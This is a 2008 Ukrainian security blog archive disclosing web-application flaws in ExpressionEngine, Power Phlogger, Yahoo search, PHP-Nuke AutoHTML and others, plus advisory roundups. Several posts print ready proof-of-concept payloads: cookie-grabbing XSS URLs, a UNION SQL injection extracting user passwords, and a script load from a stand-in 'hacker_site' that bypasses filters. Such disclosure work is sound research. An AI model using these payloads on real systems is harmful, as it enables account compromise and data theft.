Архів для категорії 'Уразливості'

Cross-Site Scripting в stats для WordPress

23:56 12.06.2008

В травні минулого року була виявлена Cross-Site Scripting уразливість в stats плагіні для WordPress.

Це persistent XSS уразливість, яка мала місце в плагіні stats, що дозволяє мати статистику відвідувань від wordpress.com. Уразливим було поле referer в статистиці, що накопичує плагін. Дана уразливість вже виправлена.

  • Persistent cross-site scripting in wordpress.com dashboard (деталі)

Добірка уразливостей

16:34 12.06.2008

В даній добірці уразливості в веб додатках:

  • Updated webmin packages fix XSS vulnerability (деталі)
  • SQL-ін’єкція, перегляд реквізитів доступу до БД в AJ HYIP (деталі)
  • Overwrite variables eqDKP 1.3.2d and prior (login.php) (деталі)
  • Vulnerability in phpTrafficA < 1.4.2 (деталі)
  • Calendarix version 0.7. 20070307 Multiple Path Disclosure Vulnerabilities (деталі)
  • MyNews version 0.10 SQL Injection Vulnerability (деталі)
  • Calendarix version 0.7. 20070307 Multiple XSS Attacks (деталі)
  • Calendarix version 0.7. 20070307 Multiple SQL Injection Vulnerabilities (деталі)
  • Pluxml 0.3.1 Remote Code Execution Exploit (деталі)
  • PHP-інклюдинг в BBClone (деталі)

Уразливість в ExpressionEngine

20:31 11.06.2008

08.05.2008

У жовтні, 16.10.2007, я знайшов Cross-Site Scripting уразливість в системі ExpressionEngine. Раніше я вже писав про уразливість в ExpressionEngine.

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам системи.

11.06.2008

Уразливість в скрипті index.php в параметрі URL, якщо включений meta-refresh редиректор.

XSS:

http://site/index.php?URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія ExpressionEngine 1.3.1 та попередні. Починаючи з версії ExpressionEngine 1.4 уразливість вже виправлена, як повідомили мені розробники EE. Спочатку я виявив дану дірку на сайті з EE 1.6.0 (а потім 1.6.3), але як я вияснив на тому сайті використовувся старий index.php, тому вразливими є тільки версії EE до 1.3.1 включно.

Міжсайтовий скриптінг у F5 Firepass

22:49 10.06.2008

Виявлена Cross-Site Scripting уразливість у F5 Firepass.

Уразливі версії: F5 FirePass 6.0.

Міжсайтовий скриптінг через сторінку керування захистом від міжсайтового скриптінга.

Дуже весела дірка :-) . Це ще треба так вміти, щоб зробити XSS дірку в панелі керування захистом від XSS.

  • F5 FirePass Content Inspection Management XSS (деталі)

Добірка уразливостей

16:17 10.06.2008

В даній добірці уразливості в веб додатках:

Уразливість на www.godado.it

20:15 09.06.2008

07.02.2008

У липні, 08.07.2007, я знайшов Cross-Site Scripting уразливість в пошуковій системі http://www.godado.it. Про що найближчим часом сповіщу адміністрацію системи.

До речі, даний пошуковець використовує движок Ask.com (тому дана компанія також несе відповідальність за уразливість).

Детальна інформація про уразливість з’явиться пізніше.

09.06.2008

XSS:

Дану уразливість вже виправили. Але зробили це лише частково, тому при невеличкій модифікації коду вона знову працює.

XSS:

Нові уразливості в Power Phlogger

23:54 31.05.2008

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 31.05.2008, я виявив SQL Injection, Information Leakage та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

Information Leakage:

http://site/robots.txt

В robots.txt вказані важливі папки системи, що дозволяє знайти її ресурси та виявити інші Information Disclosure уразливості.

Full path disclosure:

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це п’ята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Добірка уразливостей

16:31 31.05.2008

В даній добірці уразливості в веб додатках:

Уразливість на search.yahoo.com

20:14 30.05.2008

21.09.2007

Позавчора, 19.09.2007, я знайшов Cross-Site Scripting уразливість на http://search.yahoo.com - в пошуковій системі Yahoo. Про що найближчим часом сповіщу адміністрацію системи.

Раніше я вже писав під час MOSEB про уразливість в Image Search of Yahoo! Search.

Детальна інформація про уразливість з’явиться пізніше.

30.05.2008

XSS:

Дану уразливість, що працює при UTF-8 кодуванні сторінки (яке задане в Yahoo), вони вже виправили. Але дана уразливість також працює з Japanese (SHIFT_JIS) та Japanese (Auto-Select) кодуванням в Internet Explorer (але тільки, коли їх задати власноруч в браузері).

XSS:

Дана уразливість так досі не виправлена (хоча про другу уразливість, при двох інших кодуваннях, я Yahoo повідомляв).

Уразливість в AutoHTML для PHP-Nuke

23:53 29.05.2008

Вчора, 28.05.2008, я знайшов Cross-Site Scripting уразливість в модулі AutoHTML для PHP-Nuke. Про Local File Inclusion, Directory Traversal та Information Leakage уразливості в даному модулі для PHP-Nuke я писав раніше.

XSS:

http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.js%20

В даному випадку відбувається обхід анти-XSS фільтрів PHP-Nuke.

Уразлива версія PHP-Nuke AutoHTML Module 2.0 (та потенційно інші версії).